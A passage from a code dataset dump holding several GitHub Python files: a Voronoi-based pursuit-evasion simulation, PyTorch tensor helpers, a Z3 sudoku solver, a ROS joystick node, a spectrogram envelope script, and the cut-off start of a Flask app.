= bound[1]\n y1 = (-c - a * bound[1]) / b\n flag = 1\n else:\n # 找到过符合要求的交点\n x2 = bound[1]\n y2 = (-c - a * bound[1]) / b\n flag = 2\n\n if (-c - b * bound[2]) / a <= bound[1] and (-c - b * bound[2]) / a >= bound[0]:\n # 线和y=bound[2]存在符合要求的交点\n if flag == 0:\n y1 = bound[2]\n x1 = (-c - b * bound[2]) / a\n flag = 1\n else:\n y2 = bound[2]\n x2 = (-c - b * bound[2]) / a\n flag = 2\n\n if (-c - b * bound[3]) / a <= bound[1] and (-c - b * bound[3]) / a >= bound[0]:\n # 线和y=bound[3]存在符合要求的交点\n if flag == 0:\n y1 = bound[3]\n x1 = (-c - b * bound[3]) / a\n flag = 1\n else:\n y2 = bound[3]\n x2 = (-c - b * bound[3]) / a\n flag = 2\n if flag == 1:\n # 只存在一个交点\n x2 = x1\n y2 = y1\n\n return x1, y1, x2, y2\n\n\n##-----------------------------获取Voronoit图中需要连接的两点-------------------------------##\n## A B为需要连接的两点,因为需要考虑其中点在边界以外,这个需要截取线段在边界内部的部分,如果都在外面则舍弃\n## flag 1表示A、B两点不是都在边界以外 0表示A、B两点都在边界以外\n## C表示截取线段中位于边界上的端点\ndef intersect(A, B, bound):\n flag = 0\n C = [0, 0]\n if A[0] >= bound[0] and A[0] <= bound[1] and A[1] >= bound[2] and A[1] <= bound[3]:\n # A点在区域内部\n if B[0] >= bound[0] and B[0] <= bound[1] and B[1] >= bound[2] and B[1] <= bound[3]:\n # B点在区域内\n flag = 1\n return A[0], A[1], B[0], B[1], flag\n else:\n # B点不在区域内\n flag = 1\n if (A[0] == B[0]):\n # AB的斜率不存在\n if (B[1] > bound[3]):\n x = A[0]\n y = bound[3]\n else:\n x = A[0]\n y = bound[2]\n C[0] = x\n C[1] = y\n else:\n # AB的斜率存在\n a = A[1] - B[1]\n b = B[0] - A[0]\n c = B[1] * A[0] - A[1] * B[0]\n x1, y1, x2, y2 = get_intersect_point(a, b, c, bound)\n if x1 >= min(A[0], B[0]) and x1 <= max(A[0], B[0]) and y1 >= min(A[1], B[1]) and y1 <= max(A[1], B[1]):\n C[0] = x1\n C[1] = y1\n else:\n C[0] = x2\n C[1] = y2\n return A[0], A[1], C[0], C[1], flag\n else:\n # A点不在区域内部\n if B[0] >= bound[0] and B[0] <= bound[1] and B[1] >= bound[2] and B[1] <= bound[3]:\n # B点在区域内\n flag = 1\n if (A[0] == B[0]):\n # AB的斜率不存在\n if (A[1] > bound[3]):\n x = B[0]\n y = bound[3]\n else:\n x = B[0]\n y = bound[2]\n C = [x, y]\n else:\n # AB的斜率存在\n a = A[1] - B[1]\n b = B[0] - A[0]\n c = B[1] * A[0] - A[1] * B[0]\n x1, y1, x2, y2 = get_intersect_point(a, b, c, bound)\n if x1 >= min(A[0], B[0]) and x1 <= max(A[0], B[0]) and y1 >= min(A[1], B[1]) and y1 <= max(A[1], B[1]):\n C[0] = x1\n C[1] = y1\n else:\n C[0] = x2\n C[1] = y2\n return B[0], B[1], C[0], C[1], flag\n else:\n flag = 1\n if (A[0] == B[0]):\n flag = 0\n return A[0], A[1], B[0], B[1], flag\n else:\n a = A[1] - B[1]\n b = B[0] - A[0]\n c = B[1] * A[0] - A[1] * B[0]\n x1, y1, x2, y2 = get_intersect_point(a, b, c, bound)\n return x1, y1, x2, y2, flag\n\n\n##----------------------------------判断两点是否位于直线异侧--------------------------------##\n## p1和p2为直线上的两点,p3和p4是需要进行判断的两点\n## a b c为直线p1p2解析式ax+by+c=0中的参数\ndef IsIntersec(p1, p2, p3, p4):\n a = p1[1] - p2[1]\n b = p2[0] - p1[0]\n c = p1[0] * p2[1] - p2[0] * p1[1]\n if (a * p3[0] + b * p3[1] + c) * (a * p4[0] + b * p4[1] + c) <= 0:\n return 1\n else:\n return 0\n\n\n##-------------------------------获取中垂线和边界符合要求的交点------------------------------##\n## A B为需要求中垂线的的线段的两个端点 C为三角形中除了A和B以外剩下的顶点 D为符合要求的交点\n## a b c为中垂线解析式中的参数\n## (x1, y1) (X2,y2)为中垂线和边界的两个交点的坐标\ndef midline(A, B, C, bound):\n a = 2 * (B[0] - A[0])\n b = 2 * (B[1] - A[1])\n c = A[0] ** 2 - B[0] ** 2 + A[1] ** 2 - B[1] ** 2\n x1, y1, x2, y2 = get_intersect_point(a, b, c, bound)\n D = [x1, y1]\n if IsIntersec(A, B, C, D):\n D = [x1, y1]\n else:\n D = [x2, y2]\n return D\n\n\n##-----------------------------------获取li的两个端点-------------------------------------##\ndef get_l_point(A, B, C, D):\n # A-交点1 B-交点2 C-evader D-pursuer\n a1 = A[1] - B[1]\n b1 = B[0] - A[0]\n c1 = B[1] * A[0] - B[0] * A[1]\n a2 = C[1] - D[1]\n b2 = D[0] - C[0]\n c2 = D[1] * C[0] - D[0] * C[1]\n d = a1 * b2 - a2 * b1\n x1 = (b1 * c2 - b2 * c1) / d\n y1 = (a2 * c1 - a1 * c2) / d\n v1 = [D[0] - A[0], D[1] - A[1]]\n v2 = [D[0] - C[0], D[1] - C[1]]\n if np.cross(v1, v2) > 0:\n x2 = A[0]\n y2 = A[1]\n else:\n x2 = B[0]\n y2 = B[1]\n return x1, y1, x2, y2\n\n\n##-----------------------------------获取evader的策略-------------------------------------##\nevader_strategy = queue.Queue()\n\n\ndef evader_controller(event):\n global evader_strategy\n if evader_strategy.qsize() < 10:\n print(\"evader策略队列未满\")\n evader_strategy.put([event.xdata, event.ydata])\n print(event.xdata, event.ydata)\n else:\n print(\"evader策略队列已满\")\n return\n\n\n## ------------------------------------Main Function------------------------------------##\n# 绘制图的坐标X和Y\nax = []\nay = []\n\n# 动态图\nplt.ion()\nfig = plt.figure()\n\n# 更新步长\nstep = 5\n\n# 设置区域边界\nbounding_box = np.array([0., 10., 0., 10.])\nE_ = [[0., 4.], [0., 6.]]\nE_ = np.array(E_)\n\n# 绘制边界\nplt.plot([bounding_box[0], E_[0][0]], [bounding_box[2], E_[0][1]], 'k-')\nplt.plot([E_[1][0], bounding_box[0]], [E_[1][1], bounding_box[3]], 'k-')\nplt.plot([bounding_box[1], bounding_box[1]], [bounding_box[2], bounding_box[3]], 'k-')\nplt.plot([bounding_box[0], bounding_box[1]], [bounding_box[2], bounding_box[2]], 'k-')\nplt.plot([bounding_box[0], bounding_box[1]], [bounding_box[3], bounding_box[3]], 'k-')\n\npoints = []\n\nRc_limt = 0.5\n\nwhile True:\n points_pos = plt.ginput(3)\n print(\"初始坐标:\")\n print(points_pos)\n if initial_judge(points_pos, E_, Rc_limt):\n j = 0\n # evader i=0\n ax.append(points_pos[0][0])\n ay.append(points_pos[0][1])\n points.append([ax[j], ay[j]])\n j = j + 1\n # defender i=1\n defender_i = get_defender(points_pos, E_)\n ax.append(points_pos[defender_i][0])\n ay.append(points_pos[defender_i][1])\n points.append([ax[j], ay[j]])\n j = j + 1\n # pursuers i=2.3\n for i in range(1, 3):\n if i != defender_i:\n ax.append(points_pos[i][0])\n ay.append(points_pos[i][1])\n points.append([ax[j], ay[j]])\n j = j + 1\n break\n\npoints = np.array(points)\n\n# 计算各个pursuer到evader的距离\nRc = []\n\nfor i in range(1, 3):\n Rc.append(np.sqrt(np.sum(np.square(points[0] - points[i]))))\n\nRc = np.array(Rc)\n\nD = [0, 0]\n\nd = [points[0][0], points[0][1]]\n\n# 获取鼠标键入\ncid = fig.canvas.mpl_connect('button_press_event', evader_controller)\n\nwhile Rc[0] > 0.5 and Rc[1] > 0.5 and points[0][0] - D[0] >= 0:\n print(\"-------------------------------test----------------------------\")\n # print(Rc[0], Rc[1])\n print(\"点的坐标:\")\n print(points)\n # 计算Rc\n for i in range(0, 2):\n Rc[i] = (np.sqrt(np.sum(np.square(points[0] - points[i + 1]))))\n print(Rc[i])\n\n # 默认0号point就是evader,1号point是defender\n print(\"evader:\")\n print(points[0])\n\n print(\"defender:\")\n print(points[1])\n\n # 绘制pursuers和evader的点\n plt.clf()\n plt.plot(ax[0], ay[0], 'gp')\n plt.plot(ax[1], ay[1], 'b*')\n plt.plot(ax[2:], ay[2:], 'ro')\n\n # 绘制边界\n plt.plot([bounding_box[0], E_[0][0]], [bounding_box[2], E_[0][1]], 'k-')\n plt.plot([E_[1][0], bounding_box[0]], [E_[1][1], bounding_box[3]], 'k-')\n plt.plot([bounding_box[1], bounding_box[1]], [bounding_box[2], bounding_box[3]], 'k-')\n plt.plot([bounding_box[0], bounding_box[1]], [bounding_box[2], bounding_box[2]], 'k-')\n plt.plot([bounding_box[0], bounding_box[1]], [bounding_box[3], bounding_box[3]], 'k-')\n\n s = []\n\n # 计算s1和s2\n for i in range(0, 2):\n s.append(np.sqrt(np.sum(np.square(E_[i] - points[1]))) - np.sqrt(np.sum(np.square(E_[i] - points[0]))))\n\n # Sj+的宽度定义\n wid = 0.5\n\n defender_flag = -1\n\n # 制定defender的策略\n if s[0] < 0 and s[1] < 0:\n # 位于Dp内部\n defender_flag = 1\n elif s[0] < wid and s[0] >= 0:\n # 位于S1和S1+上\n defender_flag = 0\n uj_ = (E_[0] - points[1]) / (step * np.sqrt(np.sum(np.square(E_[0] - points[1]))))\n elif s[1] < wid and s[1] >= 0:\n # 位于S2和S2+上\n defender_flag = 0\n uj_ = (E_[1] - points[1]) / (step * np.sqrt(np.sum(np.square(E_[1] - points[1]))))\n\n\n Ve_ = []\n # 三点共线的时候\n if points[0][0] * points[1][1] - points[1][0] * points[0][1] + points[1][0] * points[2][1] - points[2][0] * \\\n points[1][1] + points[2][0] * points[0][1] - points[0][0] * points[2][1] == 0:\n print(\"此时三点共线\")\n for i in range(0, 2):\n Ve_.append((points[0] - points[i + 1]) / (step * Rc[i]))\n if defender_flag == 0:\n print(\"defender在Sj U Sj+内,执行防御策略\")\n points[1] = points[1] + uj_\n points[2] = points[2] + Ve_[1]\n else:\n print(\"defender在Dp内部,执行追捕策略\")\n points[i + 1] = points[i + 1] + Ve_[i]\n else:\n # 生成Delaunay图,tri.simplices为三角形中顶点的索引,索引值为points中的索引值\n tri = Delaunay(points)\n\n # 打印三角形的顶点索引\n # print(\"Delaunay三角形的顶点索引\")\n # print(tri.simplices)\n\n # 声明外心和Delaunay三角网中三角形\n circle = []\n tri_lines = []\n\n # 获取三角形的外心和边的索引\n for num in range(0, tri.simplices.shape[0]):\n print(num)\n plt.axis('equal')\n plt.axis('off')\n x, y, r = get_outer_circle(points[tri.simplices[num][0]], points[tri.simplices[num][1]],\n points[tri.simplices[num][2]])\n circle.append([x, y])\n tri.simplices[num].sort() # 对Delaunay三角形的顶点按照索引大小排序,方便对构造边的索引\n # print(\"Delaunay三角形的顶点坐标:\")\n # print(points[tri.simplices[num][0]], points[tri.simplices[num][1]], points[tri.simplices[num][2]])\n # 用边的顶点的索引构成边的元组,dic中key���不能为list,但可以是元组\n tup = (tri.simplices[num][0], tri.simplices[num][1])\n tri_lines.append(tup)\n tup = (tri.simplices[num][0], tri.simplices[num][2])\n tri_lines.append(tup)\n tup = (tri.simplices[num][1], tri.simplices[num][2])\n tri_lines.append(tup)\n\n # print(\"Delaunay所有三角形的边的索引对:\")\n # print(tri_lines)\n\n # 构造边对应三角形索引的桶,遍历三角网中每个三角形的各边,获得边对应的三角形dic: (端点1,端点2):[三角形1,三角形2]\n # 三角形使用索引值为Delaunay()生成的三角网tri对每个三角形定义的索引值\n i = 0\n dic = dict()\n for tri_line in tri_lines:\n if tri_lines[i] in dic.keys():\n dic[tri_lines[i]].append(int(i) // int(3))\n i = i + 1\n else:\n dic[tri_lines[i]] = [int(i) // int(3)]\n i = i + 1\n\n print(\"边-三角形对应情况:\")\n print(dic)\n\n # 构造Voronoi图,voronoi_graph对应关系为:具有相邻关系的两个智能体坐标索引-两智能体之间的Voronoi边\n voronoi_graph = dict()\n\n # 绘制Voronoi图\n # 遍历三角网中的每条边\n for key, value in dic.items():\n print(key)\n print(\"边对应的三角形:\")\n print(value)\n if len(value) == 2:\n # 该边是有公共三角形的边,则连接外心\n # print(circle[value[0]], circle[value[1]])\n x1, y1, x2, y2, flag = intersect(circle[value[0]], circle[value[1]], bounding_box)\n # key值对应的两个智能体之间的Voronoi边\n voronoi_graph[key] = [[x1, y1], [x2, y2]]\n if flag:\n # flag为1 表示AB两点没有都在区域外面\n p1 = [x1, x2]\n p2 = [y1, y2]\n # print(\"Voronoi边的端点:\")\n # print(p1, p2)\n # 绘制Voronoi边\n plt.plot(p1, p2, 'y-')\n else:\n # 没有公共边的三角形 连接外心和中垂线的交点\n print(\"没有公共边三角形\")\n # 获取三角形剩下的顶点\n for i in range(0, 3):\n if (tri.simplices[value[0]][i] != key[0] and tri.simplices[value[0]][i] != key[1]):\n peak = [points[tri.simplices[value[0]][i]][0], points[tri.simplices[value[0]][i]][1]]\n break\n # 获取Voronoi边的端点\n if circle[value[0]][0] < bounding_box[0] or circle[value[0]][0] > bounding_box[1] or circle[value[0]][\n 1] < bounding_box[2] or circle[value[0]][1] > bounding_box[3]:\n x1, y1 = circle[value[0]][0], circle[value[0]][1]\n x2, y2 = midline(points[key[0]], points[key[1]], peak, bounding_box)\n flag = 0\n else:\n x1, y1, x2, y2, flag = intersect(circle[value[0]],\n midline(points[key[0]], points[key[1]], peak, bounding_box),\n bounding_box)\n # key值对应的两个智能体之间的Voronoi边\n voronoi_graph[key] = [[x1, y1], [x2, y2]]\n if flag:\n # flag为1 表示AB两点没有都在区域外面\n p1 = [x1, x2]\n p2 = [y1, y2]\n # print(\"Voronoi边的端点:\")\n # print(p1, p2)\n # 绘制Voronoi边\n plt.plot(p1, p2, 'y-')\n\n # 声明evader相邻和不相邻的pursuer的points索引\n neighbor = []\n unneighbor = []\n\n # 获取evader相邻的pursuers的points索引值并存入neighbor中\n for tri_line in tri_lines:\n if (tri_line[0] == 0 or tri_line[1] == 0):\n if tri_line[1] + tri_line[0] not in neighbor:\n if voronoi_graph[tri_line][0][0] != voronoi_graph[tri_line][1][0] or voronoi_graph[tri_line][0][\n 1] != voronoi_graph[tri_line][1][1]:\n neighbor.append(tri_line[1] + tri_line[0])\n\n # 获取evader不相邻的pursuers的points索引值并存入unneighbor中\n for i in range(1, 3):\n if i not in neighbor:\n unneighbor.append(i)\n\n vp = []\n\n for i in range(1, 3):\n if i in neighbor:\n if i == 1:\n if defender_flag:\n mid = np.array([(voronoi_graph[(0, i)][0][0] + voronoi_graph[(0, i)][1][0]) / 2,\n (voronoi_graph[(0, i)][0][1] + voronoi_graph[(0, i)][1][1]) / 2])\n vp.append((mid - points[i]) / (step * np.sqrt(np.sum(np.square(mid - points[i])))))\n else:\n vp.append(uj_)\n else:\n mid = np.array([(voronoi_graph[(0, i)][0][0] + voronoi_graph[(0, i)][1][0]) / 2,\n (voronoi_graph[(0, i)][0][1] + voronoi_graph[(0, i)][1][1]) / 2])\n vp.append((mid - points[i]) / (step * np.sqrt(np.sum(np.square(mid - points[i])))))\n else:\n if i == 1:\n if defender_flag:\n vp.append((points[0]-points[i]) / (step * np.sqrt(np.sum(np.square(points[0] - points[i])))))\n else:\n vp.append(uj_)\n else:\n vp.append((points[0]-points[i]) / (step * np.sqrt(np.sum(np.square(points[0] - points[i])))))\n\n vp = np.array(vp)\n\n for i in range(1, 3):\n points[i] = points[i] + vp[i-1]\n\n\n # evader运动策略 随机运动 最大速度为1\n # Ve_x = E_[0][0] - points[0][0]\n # Ve_x = random.uniform(-0.2, 0.2)\n # Ve_y = random.uniform(E_[0][1], E_[1][1]) - points[0][1]\n # Ve_y = np.sqrt(0.04-np.square(Ve_x))\n if evader_strategy.empty():\n # 队列中不存在策略\n if points[0][0] == d[0] and points[0][1] == d[1]:\n # 到达上次设定的目的地\n D = [0, 0]\n else:\n # 未到达上次设定的目的地\n D = d / (step * np.sqrt(np.sum(np.square(d - points[0]))))\n else:\n # 队列中存在策略,获取策略,更新D值\n evader_ = evader_strategy.get()\n d = [evader_[0] - points[0][0], evader_[1] - points[0][1]]\n d = np.array(d)\n D = d / (step * np.sqrt(np.sum(np.square(d))))\n\n\n points[0] = points[0] + D\n\n for i in range(0, 3):\n if points[i][0] > bounding_box[1]:\n points[i][0] = bounding_box[1]\n\n if points[i][0] < bounding_box[0]:\n if points[i][1] >= E_[1][1] and points[i][1] <= E_[0][1]:\n points[i][0] = bounding_box[0]\n\n if points[i][1] > bounding_box[3]:\n points[i][1] = bounding_box[3]\n\n if points[i][1] < bounding_box[2]:\n points[i][1] = bounding_box[2]\n\n ax[i] = points[i][0]\n ay[i] = points[i][1]\n\n plt.pause(0.0001)\n plt.ioff\n plt.show()\n\nif points[0][0] - D[0] < 0:\n print(\"Escape Successfully\")\nelse:\n print(\"Capture Successfully!\")\n\n","repo_name":"Freedom-Guo/Multi-Agent","sub_path":"voronoi_single_exit.py","file_name":"voronoi_single_exit.py","file_ext":"py","file_size_in_byte":24476,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"} +{"seq_id":"41800153861","text":"import numpy\nimport torch\nimport torch.nn as nn\nfrom torch.nn.utils.rnn import PackedSequence\n\nfrom thseq.utils.types import rset_attr\n\n\ndef mask_from_length(lens, maxlen=None):\n if not maxlen:\n maxlen = lens.max()\n\n range = torch.arange(0, maxlen).to(lens).expand(lens.size(0), -1)\n return range >= lens.view(-1,1)\n\n\ndef dropout(input, training: bool, dropout: nn.Dropout):\n if isinstance(input, PackedSequence):\n data = dropout(input.data)\n output = PackedSequence(data, input.batch_sizes)\n else:\n output = dropout(input)\n return output\n\n\ndef clip_grad_norm_(tensor, max_norm):\n grad_norm = torch.norm(tensor).item()\n if grad_norm > max_norm > 0:\n clip_coef = max_norm / (grad_norm + 1e-6)\n tensor.mul_(clip_coef)\n return grad_norm\n\n\ndef cuda(tensor_or_module, required=False):\n if tensor_or_module is None:\n return None\n if isinstance(tensor_or_module, numpy.ndarray):\n tensor_or_module = torch.tensor(tensor_or_module)\n\n if torch.cuda.is_available():\n tensor_or_module = tensor_or_module.cuda()\n elif required:\n raise RuntimeError('CUDA is required but not currently available.')\n\n return tensor_or_module\n\n\ndef get_parameters(outer, *exclude_from):\n paras = []\n for para in outer.parameters():\n exclude = False\n for item in exclude_from:\n if isinstance(item, nn.Module):\n other = list(item.parameters())\n else:\n other = [item]\n for para2 in other:\n if para is para2:\n exclude = True\n break\n if exclude:\n break\n if not exclude:\n paras.append(para)\n\n return paras\n\n\ndef share_parameters(module, share_to, strict=True):\n assert isinstance(module, nn.Module)\n assert isinstance(share_to, nn.Module)\n\n is_parameter = lambda name, module: any(name == name_ for name_, _ in module.named_parameters())\n\n for name, para in module.named_parameters():\n if not is_parameter(name, share_to):\n if strict :\n raise RuntimeError(f'{name} is not an attribute of to_module'\n f' or it\\'s not an instance of nn.Parameter')\n else:\n continue\n else:\n rset_attr(share_to, attr=name, val=para)\n\n\ndef pack_tensors(tensors, padding_value, dtype=None):\n dtype = dtype or tensors[0].dtype\n device = tensors[0].device\n lens = tensors[0].new_tensor([a.shape[0] for a in tensors])\n max_len = torch.max(lens)\n a = torch.zeros((len(tensors), int(max_len.item()))) + padding_value\n a = a.to(device=device, dtype=dtype)\n mask = torch.arange(max_len).to(device=device) < lens[:, None]\n a[mask] = torch.cat(tensors)\n return a\n","repo_name":"DeepLearnXMU/ABDNMT-RNMT","sub_path":"thseq/utils/tensor.py","file_name":"tensor.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"67"} +{"seq_id":"4154545297","text":"\"\"\"\nModule for solving Sudoku 9x9 puzzles using Z3.\n\"\"\"\nimport fileinput\nfrom typing import Dict, List, Tuple\n\nimport numpy as np\nimport pandas as pd\nfrom z3 import Distinct, Int, Solver, sat\n\n\ndef sudoku_solver(sudoku: List[str]) -> str:\n \"\"\"sudoku_solver solve the given sudoku using Z3\n\n Parameters\n ----------\n sudoku : List[str]\n List of 9 strings of length 9\n\n Returns\n -------\n str\n the solution string formatted with new line characters\n at every 3 characters.\n \"\"\"\n first_row = sudoku[0]\n # Only works on 9x9 (can be easily extended to general cases)\n assert (\n (np.array([len(r) for r in sudoku]) == len(first_row)).all()\n and len(first_row) == 9\n and len(sudoku) == 9\n )\n x = np.arange(len(sudoku))\n y = np.arange(len(first_row))\n s = Solver()\n board: Dict[Tuple[int, int], Int] = {}\n # board definition\n for i in x:\n for j in y:\n board[(i, j)] = Int(f\"({i:d},{j:d})\")\n s.add(board[(i, j)] <= 9, board[(i, j)] >= 1)\n\n for i in x:\n # distinct row\n s.add(Distinct([board[(i, j)] for j in y]))\n # distinct col\n s.add(Distinct([board[(j, i)] for j in y]))\n\n # distinct grid\n for i in range(3):\n for j in range(3):\n s.add(\n Distinct(\n [board[(m + i * 3, n + j * 3)] for m in range(3) for n in range(3)]\n )\n )\n # now we put the assumptions of the given puzzle into the solver:\n for i in x:\n for j in y:\n if sudoku[i][j] != \" \" and sudoku[i][j] != \".\":\n s.add(board[(i, j)] == int(sudoku[i][j]))\n\n assert s.check() == sat, \"Unsat\"\n\n model = s.model()\n solution = \"\\n\".join(\n [\"\".join([model.evaluate(board[(i, j)]).as_string() for j in y]) for i in x]\n )\n return solution\n\n\ndef std_input_to_sudoku() -> List[str]:\n \"\"\"std_input_to_sudoku read a sudoku puzzle from std-in\n\n Returns\n -------\n List[str]\n the processed sudoku puzzle\n \"\"\"\n sudoku = []\n for line in fileinput.input():\n line = line.rstrip(\"\\n\")\n assert len(line) == 9, \"Invalid length input. Can only solve 9x9.\"\n sudoku.append(line)\n if len(sudoku)==9:\n break\n return sudoku\n\n\ndef main():\n \"\"\"main solve a sudoku from stdin. Can use '.' or ' ' for empty cells.\n i.e.\n...2857..\n.193.....\n.8...1.6.\n.45.6....\n.27...14.\n....5.68.\n.3.9...5.\n.....347.\n..1528...\n \"\"\"\n puzzle = std_input_to_sudoku()\n s_solved = sudoku_solver(puzzle)\n print(s_solved)\n\n\ndef test_validity():\n \"\"\"test_validity test validity of the algorithm on a sudoku dataset.\n 100 sudoku sampled from:\n https://www.kaggle.com/datasets/radcliffe/3-million-sudoku-puzzles-with-ratings\n \"\"\"\n df = pd.read_csv(\"assets/sudoku.csv\")\n sudokus = df[\"puzzle\"].apply(lambda x: np.array(list(x)).reshape(9, 9))\n solutions = sudokus.apply(lambda x: sudoku_solver(x).replace(\"\\n\", \"\"))\n assert (df[\"solution\"] == solutions).all()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fostiropoulos/theorem-prover","sub_path":"sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8452075841","text":"#!/usr/bin/env python\n# Intro to Robotics - EE5900 - Spring 2017\n# Final Project\n# Philip (Team Lead)\n# Ian\n# Akhil\n#\n# Revision: v1.2\n\n# imports\nimport rospy\nimport smach\nimport smach_ros\nfrom sensor_msgs.msg import Joy\n\nclass JoystickButtonPause(smach.State):\n def __init__(self, topic, button, timeout=None):\n super(JoystickButtonPause, self).__init__(outcomes=['BUTTON_PRESSED', 'BUTTON_NEVER_PRESSED'])\n self.button_pause = button\n self.topic = topic\n self.timeout = timeout\n\n def execute(self, userdata):\n while not rospy.is_shutdown():\n try:\n payload = rospy.wait_for_message(self.topic, Joy, timeout=self.timeout)\n\n if payload.buttons[self.button_pause]:\n return 'BUTTON_PRESSED'\n except (rospy.ROSException, rospy.ROSInterruptException) as e:\n rospy.logwarn(e)\n continue\n\n return 'BUTTON_NEVER_PRESSED'\n\n# standard ros boilerplate\nif __name__ == \"__main__\":\n try:\n rospy.init_node('joystick_state')\n joy = JoystickButtonPause('/bluetooth_teleop/joy', 0)\n joy.execute([])\n except rospy.ROSInterruptException:\n pass\n","repo_name":"pdscraml/bunny-hunter","sub_path":"catkin_ws/src/easter_egg_hunt/scripts/joystick.py","file_name":"joystick.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42513738160","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[9]:\n\n\nimport numpy as np\nimport plotly.offline as py\nimport plotly.graph_objs as go\nfrom scipy.interpolate import interp1d\nimport scipy.io as sio\nfrom random import randint\nimport json\nimport os\nimport sys\nimport sounddevice as sd\nimport soundfile as sf\nimport h5py\n\nsys.path.append('./src')\n\nimport additive_synth\nfrom rescale import rescale\n\nnp.set_printoptions(threshold=9999)\n\n# In[3]:\n\n# Initialize\n\nbpm = 120\nppqn = 48\nsmoothing_level = 0 # from 0 to 2 (int)\ninput_filename = 'higurashi_1.mat'\n\n\n# In[2]:\n\n\ndef get_envelope(input_signal, repeat=1):\n # Taking the absolute value\n t = np.arange(input_signal.shape[-1])\n\n absolute_signal = abs(input_signal)\n\n signal = absolute_signal\n\n for i in range(repeat):\n # Peak detection\n ## Init\n isPeak = np.zeros(signal.shape[-1], dtype=bool)\n last_idx = signal.shape[-1] - 1\n\n ## Define subfunction\n def find_prev_specimen():\n if sample_idx == 0:\n return 0.\n return signal[sample_idx - 1]\n\n def find_next_specimen():\n if sample_idx == last_idx:\n return 0.\n return signal[sample_idx + 1]\n\n ## Main\n for sample_idx, sample in enumerate(signal):\n if sample_idx in [0, last_idx]:\n isPeak[sample_idx] = True\n continue\n prev_specimen = find_prev_specimen()\n next_specimen = find_next_specimen()\n if prev_specimen < sample and sample > next_specimen:\n isPeak[sample_idx] = True\n\n if np.sum(isPeak) < 6:\n for i in range(6 - np.sum(isPeak)):\n isPeak[randint(0, len(isPeak)) - 1] = True\n\n peaks_signal = signal[isPeak]\n peaks_time = t[isPeak]\n\n f = interp1d(peaks_time, peaks_signal, kind='cubic')\n signal = f(t)\n\n # signal = np.interp(t, peaks_time, peaks_signal)\n envelope = signal\n return envelope\n\n# %%\nwith h5py.File('./mat/' + input_filename, 'r') as mat_contents:\n print(mat_contents.keys())\n print('Importing...')\n p = np.array(mat_contents['p']).T[:, ::10]\n t = np.array(mat_contents['t']).flatten()[::10]\n freqs = np.array(mat_contents['f']).flatten()\n endtime = np.array(mat_contents['endtime'])[0][0]\n print('Successfully imported!')\n\n# In[10]: Plot Spectrogram\n# # CAUTION: Plotting spectrogram may take a lot of time\n\ndef setup_fig():\n trace = go.Heatmap(\n x=t[::100],\n y=np.log10(freqs),\n z=np.log10(p[:, ::100]),\n )\n\n data = [trace]\n\n layout = go.Layout(\n title='Partial Data',\n height=720,\n scene=dict(\n xaxis=dict(\n title=dict(\n text='Time',\n ),\n ),\n yaxis=dict(\n title=dict(\n text='Frequency',\n ),\n autorange=False\n ),\n )\n )\n return go.Figure(data, layout)\n\n\npy.plot(setup_fig(), filename='./plotly/spectrogram_p.html')\n\n# In[7]:\n\n\nn_ticks = int(endtime / 60 * bpm * ppqn)\nticks = np.linspace(0., endtime, num=n_ticks)\nmidi_amplitude = np.empty(shape=[p.shape[0], n_ticks])\nfor i, p_row in enumerate(p):\n envelope = get_envelope(p_row, smoothing_level + 1)\n midi_amplitude[i] = abs(np.interp(ticks, t, envelope))\n\n\n# In[10]: Plot Spectrogram\ndef setup_fig():\n trace = go.Heatmap(\n x=ticks[::10],\n y=np.log10(freqs),\n z=np.log10(midi_amplitude[:, ::10]),\n )\n\n data = [trace]\n\n layout = go.Layout(\n title='Partial Data',\n height=720,\n scene=dict(\n xaxis=dict(\n title=dict(\n text='Time',\n ),\n ),\n yaxis=dict(\n title=dict(\n text='Frequency',\n ),\n autorange=False\n ),\n )\n )\n return go.Figure(data, layout)\n\n\npy.plot(setup_fig(), filename='./plotly/spectrogram_midi.html')\n\n# In[10]:\n\n\namps_2d = midi_amplitude\n\nn_times = amps_2d.shape[1]\nn_freqs = amps_2d.shape[0]\n\ntimes_2d = np.empty(shape=(1, n_times))\ntimes_2d[0, :] = ticks\ntimes_2d = np.repeat(times_2d, n_freqs, axis=0)\n\nfreqs_2d = np.empty(shape=(n_freqs, 1))\nfreqs_2d[:, 0] = freqs\nfreqs_2d = np.repeat(freqs_2d, n_times, axis=1)\n\nx = times_2d.flatten()\ny = freqs_2d.flatten()\nz = amps_2d.flatten()\n\npoints = np.column_stack([x, y, z])\n\n\n# In[12]: Plot Scatter\n\ndef setup_fig():\n trace = go.Scatter3d(\n x=points[::10, 0],\n y=points[::10, 1],\n z=points[::10, 2],\n mode='markers',\n marker=dict(\n size=2,\n opacity=0.8,\n color=np.log(points[::10, 2] * 255)\n )\n )\n\n data = [trace]\n\n layout = go.Layout(\n title='Partial Data',\n hovermode='closest',\n height=900,\n margin=dict(\n l=0,\n r=0,\n b=0,\n t=0\n ),\n scene=dict(\n xaxis=dict(\n title='Time',\n ticklen=5,\n gridwidth=2,\n ),\n yaxis=dict(\n title='Frequency',\n type='log',\n ticklen=5,\n gridwidth=2,\n ),\n zaxis=dict(\n title='Amplitude',\n ticklen=5,\n gridwidth=2,\n )\n )\n )\n return go.Figure(data, layout)\n\n\npy.plot(setup_fig(), filename='./plotly/partials.html')\n\n# %%\noutput_filename = os.path.splitext(input_filename)[0] + '.json'\n\nwith open('./output/json/' + output_filename, 'w') as outfile:\n outobj = dict(partials=points.tolist())\n json.dump(outobj, outfile)\n\nprint('Result file is at')\nprint('./output/json/' + output_filename)\n\n","repo_name":"szk2s/sandbox","sub_path":"Process-Partial/from_matlab.py","file_name":"from_matlab.py","file_ext":"py","file_size_in_byte":5834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20959723041","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\n\nimport sys\nimport json\nimport dateutil.parser\nimport babel\nfrom flask import Flask, render_template, request, Response, flash,\\\n redirect, url_for, abort, make_response\nfrom flask_cors 